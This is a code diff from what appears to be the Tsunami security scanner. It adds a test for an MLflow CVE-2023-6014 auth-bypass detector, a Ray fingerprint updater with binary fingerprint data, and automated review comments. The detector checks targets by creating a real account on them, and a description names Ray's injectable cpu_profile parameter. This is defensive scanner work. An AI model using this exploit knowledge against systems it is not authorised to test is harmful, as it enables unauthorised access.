+ "Update the MLflow instances to a version that provides a fix which is newer"
+ + " than version 2.8.0, and check the user list for potential users that"
+ + " were created by exploiting this vulnerability.")
+ .addRelatedId(
+ VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-6014"))
+ .setDescription(VULN_DESCRIPTION))
+ .build();
+ }
+}
diff --git a/community/detectors/mlflow_cve_2023_6014/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetectorTest.java b/community/detectors/mlflow_cve_2023_6014/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetectorTest.java
new file mode 100644
index 000000000..a4775c349
--- /dev/null
+++ b/community/detectors/mlflow_cve_2023_6014/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetectorTest.java
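Review bot: `httpResponse.bodyString().get()` is unwrapped twice in `isServiceVulnerable` (the `Response:` log line and the `if` condition) with no presence check, so a response without a body throws `NoSuchElementException`, which `catch (IOException | AssertionError e)` does not cover and which therefore propagates out of the stream in `detect` instead of yielding false; read it once as `String body = httpResponse.bodyString().orElse("");` and test `httpResponse.status().code() == 200 && body.contains(DETECTION_STRING)`. The check also creates a real, persistent account on the target, yet the report never records which username was created, while `"Attempting to create a user (%s: %s)"` writes the credential pair into scanner logs at INFO; recording the created username in the detection report (the recommendation text already asks operators to look for such users) and dropping the password from the log would leave an auditable trail without leaking a working credential. `GenerateRandomString` should be `generateRandomString` to follow Java method naming, and the title string contains `Bypasss`, which the test asserts verbatim, so both need the same fix.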
@@ -0,0 +1,145 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve20236014; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import 
org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link Cve20236014VulnDetector}. */ +@RunWith(JUnit4.class) +public class Cve20236014VulnDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + @Inject private Cve20236014VulnDetector detector; + + private MockWebServer mockWebServer; + + @Before + public void setUp() { + mockWebServer = new MockWebServer(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new Cve20236014DetectorBootstrapModule(), + new HttpClientModule.Builder().build()) + .injectMembers(this); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + mockWebResponse(Cve20236014VulnDetector.DETECTION_STRING); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("http")) + .setServiceName("http") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2023_6014")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2023-6014 MLflow Auth Bypasss Vulnerability") + 
.setRecommendation( + "Update the MLflow instances to a version that provides a fix which is" + + " newer than version 2.8.0, and check the user list for potential" + + " users that were created by exploiting this vulnerability.") + .addRelatedId( + VulnerabilityId.newBuilder() + .setPublisher("CVE") + .setValue("CVE-2023-6014")) + .setDescription(Cve20236014VulnDetector.VULN_DESCRIPTION)) + .build()); + } + + @Test + public void detect_whenNotVulnerable_returnsNoVulnerability() throws IOException { + mockWebResponse("Hello World"); + ImmutableList httpServices = + ImmutableList.of( + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build()); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + + DetectionReportList detectionReports = detector.detect(targetInfo, httpServices); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + private void mockWebResponse(String body) throws IOException { + mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody(body)); + mockWebServer.start(); + } +} diff --git a/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java b/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java index d354fe38f..409f96499 100644 --- a/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java +++ b/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java 
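Review bot: `detect_whenVulnerable_returnsVulnerability` only checks the report the detector emits and never looks at what was sent to the mock, so a regression that POSTs the user-creation form to the wrong path or with the wrong content type still passes as long as the server answers with `DETECTION_STRING`. After the `detect` call, pull the request off the mock and pin it: `RecordedRequest req = mockWebServer.takeRequest(); assertThat(req.getMethod()).isEqualTo("POST"); assertThat(req.getPath()).endsWith(Cve20236014VulnDetector.VUL_PATH);` (needs `okhttp3.mockwebserver.RecordedRequest` and the plain Truth `assertThat`; whether `VUL_PATH` is package-visible cannot be seen from this hunk). The expected title `"CVE-2023-6014 MLflow Auth Bypasss Vulnerability"` carries a typo that mirrors the detector's string; correct both in the same change so the test keeps passing. The not-vulnerable case only covers a 200 with an unexpected body; a second case that enqueues a non-200 response (what a patched MLflow with auth enabled would return) would also exercise the status-code branch of the detector.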
@@ -154,9 +154,9 @@ private DetectionReport buildDetectionReport(
 .addRelatedId(
 VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-6019"))
 .setDescription(
- "An attacker can use the model upload functionality to load remote Linux"
- + " commands and gains code execution on the server hosting the ray"
- + " application.")
+ "A command injection exists in Ray's cpu_profile URL parameter allowing"
+ + " attackers to execute os commands on the system running the ray"
+ + " dashboard remotely without authentication.")
 .setRecommendation("Upgrade Ray to version 2.8.0. or later."))
 .build();
 }
diff --git a/google/detectors/rce/ai/cve20236019/src/test/java/com/google/tsunami/plugins/cve20236019/Cve20236019DetectorTest.java b/google/detectors/rce/ai/cve20236019/src/test/java/com/google/tsunami/plugins/cve20236019/Cve20236019DetectorTest.java
index 550c152fc..87d265151 100644
--- a/google/detectors/rce/ai/cve20236019/src/test/java/com/google/tsunami/plugins/cve20236019/Cve20236019DetectorTest.java
+++ b/google/detectors/rce/ai/cve20236019/src/test/java/com/google/tsunami/plugins/cve20236019/Cve20236019DetectorTest.java
@@ -66,9 +66,9 @@ public final class Cve20236019DetectorTest {
 .setTitle("CVE-2023-6019")
 .addRelatedId(VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-6019"))
 .setDescription(
- "An attacker can use the model upload functionality to load remote"
- + " Linux commands and gains code execution on the server hosting"
- + " the ray application.")
+ "A command injection exists in Ray's cpu_profile URL parameter allowing"
+ + " attackers to execute os commands on the system running the ray"
+ + " dashboard remotely without authentication.")
 .setRecommendation("Upgrade Ray to version 2.8.0. or later.")
 .build();
 private MockWebServer mockWebServer;
diff --git a/google/fingerprinters/web/scripts/updater/community/ray/app/docker-compose.yml b/google/fingerprinters/web/scripts/updater/community/ray/app/docker-compose.yml
new file mode 100644
index 000000000..4d59b25c6
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/ray/app/docker-compose.yml
@@ -0,0 +1,6 @@
+services:
+ ray:
+ image: rayproject/ray:${RAY_VERSION}
+ ports:
+ - "8265:8265"
+ command: sh -c "ray start --head --dashboard-host=0.0.0.0 && tail -f /dev/null"
diff --git a/google/fingerprinters/web/scripts/updater/community/ray/update.sh b/google/fingerprinters/web/scripts/updater/community/ray/update.sh
new file mode 100755
index 000000000..a82d16fe5
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/ray/update.sh
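Review bot: The `ports` entry publishes the Ray dashboard on every host interface (`"8265:8265"`), and the container starts it with `--dashboard-host=0.0.0.0`; the versions this compose file is driven through include releases below 2.8.0, which the Ray detector in this same change reports as unauthenticated command injection through the dashboard. For the duration of each fingerprinting run the updater host is therefore offering a known-RCE service to whatever network it sits on. The updater only ever talks to `http://localhost:8265`, so binding the published port to loopback is enough: `- "127.0.0.1:8265:8265"`. `--dashboard-host=0.0.0.0` inside the container has to stay, because the port mapping reaches the container over its bridge address rather than its loopback.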
@@ -0,0 +1,97 @@
+#!/usr/bin/env bash
+
+# Copyright 2022 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+set -e
+
+source ../../common.sh
+
+SCRIPT_PATH="$(cd -- "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P)"
+# Root path to the web fingerprinter plugin.
+PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)"
+# Path to the configurations for starting a live instance of Ray.
+RAY_APP_PATH="${SCRIPT_PATH}/app"
+# Path to the temporary data holder.
+TMP_DATA="/tmp/RAY_fingerprints"
+# Path to the local git repository for Ray codebase.
+GIT_REPO="${TMP_DATA}/repo"
+# Path to the directory of all the updated fingerprints data.
+FINGERPRINTS_PATH="${TMP_DATA}/fingerprints"
+# Json data of the final result.
+JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json"
+# Binary proto data of the final result.
+BIN_DATA="${FINGERPRINTS_PATH}/fingerprint.binproto"
+# Read all the versions to be fingerprinted.
+readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt"
+mkdir -p "${FINGERPRINTS_PATH}"
+
+startRay() {
+ local version="$1"
+ pushd "${RAY_APP_PATH}" >/dev/null
+ RAY_VERSION="${version}" docker compose up -d
+ popd >/dev/null
+}
+
+stopRay() {
+ local version="$1"
+ pushd "${RAY_APP_PATH}" >/dev/null
+ RAY_VERSION="${version}" docker compose down --volumes --remove-orphans
+ popd >/dev/null
+}
+
+createFingerprintForDashboard() {
+ local ray_version="$1"
+
+ echo "Fingerprinting Ray version ${ray_version} ..."
+ # Start a live instance of Ray.
+ startRay "${ray_version}"
+ # Arbitrarily chosen so that Ray is up and running.
+ echo "Waiting for Ray ${ray_version} to be ready ..."
+ sleep 30
+
+ # Checkout the repository to the correct tag.
+ checkOutRepo "${GIT_REPO}" "ray-${ray_version}"
+
+ updateFingerprint \
+ "ray" \
+ "${ray_version}" \
+ "${FINGERPRINTS_PATH}" \
+ "${GIT_REPO}/dashboard" \
+ "http://localhost:8265"
+
+ # Stop the live instance of Ray.
+ stopRay "${ray_version}"
+}
+
+
+# Convert the existing data file to a human-readable json file.
+convertFingerprint \
+ "${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/ray.binproto" \
+ "${JSON_DATA}"
+
+# Fetch Ray codebase.
+if [[ ! -d "${GIT_REPO}" ]] ; then
+ git clone https://github.com/ray-project/ray.git "${GIT_REPO}"
+fi
+
+# Update for all the versions listed in versions.txt file.
+for ray_version in "${ALL_VERSIONS[@]}"; do
+ createFingerprintForDashboard "${ray_version}"
+done
+
+convertFingerprint "${JSON_DATA}" "${BIN_DATA}"
+
+echo "Fingerprint updated for Ray. Please commit the following file:"
+echo " ${BIN_DATA}"
diff --git a/google/fingerprinters/web/scripts/updater/community/ray/versions.txt b/google/fingerprinters/web/scripts/updater/community/ray/versions.txt
new file mode 100644
index 000000000..88587e19e
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/ray/versions.txt
@@ -0,0 +1,46 @@
+0.8.7
+1.0.0
+1.0.1
+1.1.0
+1.2.0
+1.3.0
+1.4.0
+1.4.1
+1.5.0
+1.5.1
+1.5.2
+1.6.0
+1.7.0
+1.7.1
+1.8.0
+1.9.0
+1.9.1
+1.9.2
+1.10.0
+1.11.0
+1.11.1
+1.12.0
+1.12.1
+1.13.0
+1.13.1
+2.0.0
+2.0.1
+2.1.0
+2.2.0
+2.3.0
+2.3.1
+2.4.0
+2.5.0
+2.5.1
+2.6.0
+2.6.1
+2.6.2
+2.7.0
+2.7.1
+2.8.0
+2.8.1
+2.9.0
+2.9.1
+2.9.2
+2.9.3
+2.10.0
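Review bot: With `set -e` and no `trap`, a failure in `checkOutRepo` or `updateFingerprint` inside `createFingerprintForDashboard` exits the script between `startRay` and `stopRay`, leaving a network-published Ray dashboard container running on the host after the updater is gone. Register cleanup before the loop so it runs on every exit path: `trap 'stopRay "${ray_version:-}" || true' EXIT` (the loop variable is all `stopRay` needs, and `docker compose down` is harmless when nothing is up). The fixed `sleep 30` is, per its own comment, a guess; polling `curl -sf http://localhost:8265/ >/dev/null` in a bounded retry loop would shorten the happy path and fail explicitly when a release never comes up instead of handing `updateFingerprint` a dead endpoint. `source ../../common.sh` is resolved against the caller's working directory rather than `SCRIPT_PATH`, so the script presumably expects to be run from its own directory; if that is the convention shared by the sibling updaters it is fine, otherwise `source "${SCRIPT_PATH}/../../common.sh"` placed after `SCRIPT_PATH` is set makes it location-independent.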
diff --git a/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/ray.binproto b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/ray.binproto
new file mode 100644
index 000000000..3c2abb3d8
--- /dev/null
+++ b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/ray.binproto
@@ -0,0 +1,562 @@ + + +rayC +static/js/2.a5682c7a.chunk.js" + d28a0e14191dfdc62bd98d88c4e49f67F + static/js/main.e42e8231.chunk.js" + 45e6e75ace2bad126a4fee2a68d2242cE +static/css/3.65aa3b33.chunk.css" + 09c2ef992f38929fd605fd6ddce56ec5E +static/css/2.43a1c8b7.chunk.css" + e83f66081f830384222f986d6b007f56E +static/css/2.65aa3b33.chunk.css" + e0cca52d5a8221926e0cf5ed39927572@ +static/js/main.4ff4f4db.js" + 6a9f40e11fcee58a8f21d339d27a961dF + static/js/main.e00916c3.chunk.js" + aa5c26573ae9ecec6f63cb2081b0ea54F + static/js/main.bcaf7740.chunk.js" + 1be1f560a9ce402fa39dfb06c270ab831 + favicon.ico" + 5a4391b3d8ceadc536e6180e79fbb30aC +static/js/2.00747730.chunk.js" + 0a1a6766a3a078d2a114b8b75e5a2e5cF + static/js/main.518a6fb3.chunk.js" + cd3241e7df0d8382642963c56704e2e2E +static/css/6.43a1c8b7.chunk.css" + af770f9017bb84e21c4e57c78fb58ddcC +static/js/6.ba74445f.chunk.js" + a69acf09c252a11caf1dad180e648f6a@ +static/js/main.6e73a04a.js" + cffba61cc134155e5fafd63cffc06d27C +static/js/2.3f5a3866.chunk.js" + 05679525473a886d8cb01359286b3849F + static/js/main.8fe93ca5.chunk.js" + 6115e6c120379fe8224e42bcbfb830c1C +static/js/2.175eea70.chunk.js" + dc0795258b3b3ad7f377e2fa2de472aeF + static/js/main.20b4b076.chunk.js" + 2ddfac558dae265580e9add4a26eb7ee@ +static/js/main.f7757344.js" + f442da85759c08064992a27896e7ca72B +static/css/main.388a904b.css" + 34677307ee64e497878e2af66349ea14H +"static/css/main.d41b9198.chunk.css" + 44dbf61bc622d00207f3924fb30d9f65C +static/js/3.717c3504.chunk.js" + abfeb6d53d453c536ac48fff4a49c7da@ +static/js/main.cc1be436.js" + 0bcde98e6374b20d2f3b09699e088b12@ +static/js/main.27eece88.js" + f4738edee9c349b9a614e444df3f93baF + static/js/main.9dcef677.chunk.js" + deeaeb85939e6a98441e58c4715b4886@ +static/js/main.c1ceb39c.js" + 6b2a909ab5926544f0a837addba8ad95F + static/js/main.74f85e03.chunk.js" + e27bbbafbb310980dc2d8f59113394a6@ +static/js/main.5568d697.js" + d89d7ba7311292e736f3bf7b24aa7c5aH +"static/css/main.209b3f5e.chunk.css" + 
b8f2831f88f21151b8f34484cf11c740@ +static/js/main.a25f0a80.js" + 90869e062e22e9af9e57234f8a86346cF + static/js/main.4434d995.chunk.js" + 7244527194ae6c98f2ffd8fe4d3315e1@ +static/js/main.f57297a9.js" + ada85a0ffcf01d16aa58f3282cdadd99C +static/js/2.d743aa52.chunk.js" + f9f8332b6912c113fd04511eb39b4459C +static/js/2.a844c442.chunk.js" + 3bffc21d9067ad0961c17bfb8b111435C +static/js/2.c61ca79f.chunk.js" + d4358f1eeef495af2b5bfad5c6809457C +static/js/2.c7ecb373.chunk.js" + e2efe26f2697a614dc5d547fe4c62e54F + static/js/main.9962c005.chunk.js" + 82afc57373da68142a98268190d3e405F + static/js/main.19c0a982.chunk.js" + 3c023655e42aae84e6df41870c015a2f@ +static/js/main.d0f49d93.js" + 744120767bd5d91b31f1d8023ea4e441F + static/js/main.6e5108b7.chunk.js" + 47a43a5c01f5cd030257de22b531b7f0E +static/css/2.47271137.chunk.css" + c236ff5e65bb1259aa25fc1154905f92F + static/js/main.b1101dec.chunk.js" + d945c30d65fad77334caf24bb213396cC +static/js/3.2ce4cb6f.chunk.js" + 617954552c1db5effe5a0ba33ab83d4cF + static/js/main.96d021bc.chunk.js" + 58c578a1b7c75b3a36bf8da2e4ed9599@ +static/js/main.1f147255.js" + af6baa6f124bf22a7b7fb49339f3b122J +" + 3bffc21d9067ad0961c17bfb8b111435 +1.9.1 +1.9.2 +1.10.0 +1.12.1- +" + aa5c26573ae9ecec6f63cb2081b0ea54 +0.8.7. +" + 7244527194ae6c98f2ffd8fe4d3315e1 +1.12.1? +" + e83f66081f830384222f986d6b007f56 +1.7.0 +1.7.1 +1.8.0? 
+" + 09c2ef992f38929fd605fd6ddce56ec5 +2.0.0 +2.0.1 +2.1.06 +" + 0a1a6766a3a078d2a114b8b75e5a2e5c +1.0.0 +1.0.16 +" + 6b2a909ab5926544f0a837addba8ad95 +2.5.0 +2.5.1H +" + ada85a0ffcf01d16aa58f3282cdadd99 +2.9.0 +2.9.1 +2.9.2 +2.9.3- +" + af6baa6f124bf22a7b7fb49339f3b122 +2.7.0c +" + a69acf09c252a11caf1dad180e648f6a +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0¬ +" + 5a4391b3d8ceadc536e6180e79fbb30a +2.8.0 +0.8.7 +1.0.0 +1.0.1 +1.1.0 +1.2.0 +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0 +1.7.0 +1.7.1 +1.8.0 +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.1 +2.0.0 +2.0.1 +2.1.0 +2.2.0 +2.3.0 +2.3.1 +2.4.0 +2.5.0 +2.5.1 +2.6.0 +2.6.1 +2.6.2 +2.7.0 +2.7.1 +2.8.1 +2.9.0 +2.9.1 +2.9.2 +2.9.3 +2.10.06 +" + 2ddfac558dae265580e9add4a26eb7ee +1.7.0 +1.7.1- +" + deeaeb85939e6a98441e58c4715b4886 +1.8.0I +" + 45e6e75ace2bad126a4fee2a68d2242c +1.9.0 +1.9.1 +1.9.2 +1.10.0- +" + 3c023655e42aae84e6df41870c015a2f +1.1.0- +" + 0bcde98e6374b20d2f3b09699e088b12 +2.2.0. +" + f442da85759c08064992a27896e7ca72 +2.10.0- +" + d945c30d65fad77334caf24bb213396c +1.3.08 +" + 58c578a1b7c75b3a36bf8da2e4ed9599 +1.13.0 +1.13.1- +" + 744120767bd5d91b31f1d8023ea4e441 +2.4.0- +" + cffba61cc134155e5fafd63cffc06d27 +2.8.0- +" + cd3241e7df0d8382642963c56704e2e2 +1.2.0? +" + 6a9f40e11fcee58a8f21d339d27a961d +2.6.0 +2.6.1 +2.6.26 +" + 617954552c1db5effe5a0ba33ab83d4c +2.0.0 +2.0.18 +" + e2efe26f2697a614dc5d547fe4c62e54 +1.13.0 +1.13.1g +" + e0cca52d5a8221926e0cf5ed39927572 +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.16 +" + d28a0e14191dfdc62bd98d88c4e49f67 +1.7.0 +1.7.1- +" + 6115e6c120379fe8224e42bcbfb830c1 +1.0.0‚ +" + b8f2831f88f21151b8f34484cf11c740 +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.1 +2.0.0 +2.0.1 +2.1.0Q +" + c236ff5e65bb1259aa25fc1154905f92 +0.8.7 +1.0.0 +1.0.1 +1.1.0 +1.2.0- +" + d4358f1eeef495af2b5bfad5c6809457 +1.8.0- +" + 90869e062e22e9af9e57234f8a86346c +2.7.1? 
+" + 44dbf61bc622d00207f3924fb30d9f65 +1.7.0 +1.7.1 +1.8.0- +" + 05679525473a886d8cb01359286b3849 +1.9.0c +" + af770f9017bb84e21c4e57c78fb58ddc +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.06 +" + f4738edee9c349b9a614e444df3f93ba +2.3.0 +2.3.1- +" + 47a43a5c01f5cd030257de22b531b7f0 +1.0.1- +" + abfeb6d53d453c536ac48fff4a49c7da +2.1.0Ç +" + 34677307ee64e497878e2af66349ea14 +2.8.0 +2.2.0 +2.3.0 +2.3.1 +2.4.0 +2.5.0 +2.5.1 +2.6.0 +2.6.1 +2.6.2 +2.7.0 +2.7.1 +2.8.1 +2.9.0 +2.9.1 +2.9.2 +2.9.3 +2.10.06 +" + dc0795258b3b3ad7f377e2fa2de472ae +1.1.0 +1.2.0- +" + d89d7ba7311292e736f3bf7b24aa7c5a +2.8.1- +" + f9f8332b6912c113fd04511eb39b4459 +0.8.76 +" + 1be1f560a9ce402fa39dfb06c270ab83 +2.0.0 +2.0.1Z +" + e27bbbafbb310980dc2d8f59113394a6 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0- +" + 82afc57373da68142a98268190d3e405 +2.1.0"1 +static/js/2.a5682c7a.chunk.js +1.7.0 +1.7.1"G + static/js/main.e42e8231.chunk.js +1.9.0 +1.9.1 +1.9.2 +1.10.0"< +static/css/3.65aa3b33.chunk.css +2.0.0 +2.0.1 +2.1.0"< +static/css/2.43a1c8b7.chunk.css +1.7.0 +1.7.1 +1.8.0"d +static/css/2.65aa3b33.chunk.css +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.1"7 +static/js/main.4ff4f4db.js +2.6.0 +2.6.1 +2.6.2"+ + static/js/main.e00916c3.chunk.js +0.8.7"4 + static/js/main.bcaf7740.chunk.js +2.0.0 +2.0.1"• + favicon.ico +2.8.0 +0.8.7 +1.0.0 +1.0.1 +1.1.0 +1.2.0 +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0 +1.7.0 +1.7.1 +1.8.0 +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.1 +2.0.0 +2.0.1 +2.1.0 +2.2.0 +2.3.0 +2.3.1 +2.4.0 +2.5.0 +2.5.1 +2.6.0 +2.6.1 +2.6.2 +2.7.0 +2.7.1 +2.8.1 +2.9.0 +2.9.1 +2.9.2 +2.9.3 +2.10.0"1 +static/js/2.00747730.chunk.js +1.0.0 +1.0.1"+ + static/js/main.518a6fb3.chunk.js +1.2.0"` +static/css/6.43a1c8b7.chunk.css +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0"^ +static/js/6.ba74445f.chunk.js +1.3.0 +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0"% +static/js/main.6e73a04a.js +2.8.0"( +static/js/2.3f5a3866.chunk.js +1.9.0"+ + static/js/main.8fe93ca5.chunk.js +1.0.0"1 
+static/js/2.175eea70.chunk.js +1.1.0 +1.2.0"4 + static/js/main.20b4b076.chunk.js +1.7.0 +1.7.1"& +static/js/main.f7757344.js +2.10.0"Á +static/css/main.388a904b.css +2.8.0 +2.2.0 +2.3.0 +2.3.1 +2.4.0 +2.5.0 +2.5.1 +2.6.0 +2.6.1 +2.6.2 +2.7.0 +2.7.1 +2.8.1 +2.9.0 +2.9.1 +2.9.2 +2.9.3 +2.10.0"? +"static/css/main.d41b9198.chunk.css +1.7.0 +1.7.1 +1.8.0"( +static/js/3.717c3504.chunk.js +2.1.0"% +static/js/main.cc1be436.js +2.2.0". +static/js/main.27eece88.js +2.3.0 +2.3.1"+ + static/js/main.9dcef677.chunk.js +1.8.0". +static/js/main.c1ceb39c.js +2.5.0 +2.5.1"X + static/js/main.74f85e03.chunk.js +1.4.0 +1.4.1 +1.5.0 +1.5.1 +1.5.2 +1.6.0"% +static/js/main.5568d697.js +2.8.1"‚ +"static/css/main.209b3f5e.chunk.css +1.9.0 +1.9.1 +1.9.2 +1.10.0 +1.12.1 +1.13.0 +1.13.1 +2.0.0 +2.0.1 +2.1.0"% +static/js/main.a25f0a80.js +2.7.1", + static/js/main.4434d995.chunk.js +1.12.1"@ +static/js/main.f57297a9.js +2.9.0 +2.9.1 +2.9.2 +2.9.3"( +static/js/2.d743aa52.chunk.js +0.8.7"E +static/js/2.a844c442.chunk.js +1.9.1 +1.9.2 +1.10.0 +1.12.1"( +static/js/2.c61ca79f.chunk.js +1.8.0"3 +static/js/2.c7ecb373.chunk.js +1.13.0 +1.13.1"+ + static/js/main.9962c005.chunk.js +2.1.0"+ + static/js/main.19c0a982.chunk.js +1.1.0"% +static/js/main.d0f49d93.js +2.4.0"+ + static/js/main.6e5108b7.chunk.js +1.0.1"N +static/css/2.47271137.chunk.css +0.8.7 +1.0.0 +1.0.1 +1.1.0 +1.2.0"+ + static/js/main.b1101dec.chunk.js +1.3.0"1 +static/js/3.2ce4cb6f.chunk.js +2.0.0 +2.0.1"6 + static/js/main.96d021bc.chunk.js +1.13.0 +1.13.1"% +static/js/main.1f147255.js +2.7.0 \ No newline at end of file diff --git a/payloads/README.md b/payloads/README.md new file mode 100644 index 000000000..7d1571c8b --- /dev/null +++ b/payloads/README.md 
@@ -0,0 +1,13 @@
+# Tsunami Remote Payloads
+
+If a Tsunami plugin require payloads to be served remotely, you can add them in
+this folder.
+
+When adding a new payload, please make sure:
+
+1. Add a dedicated folder for the payload
+2. Include the source code for the binary payload for debuggability in the future.
+
+The long-term plan is to serve these payloads on the Tsunami callback server, so
+that we can do callback verification on top of triggering exploits and keep the
+serving url short.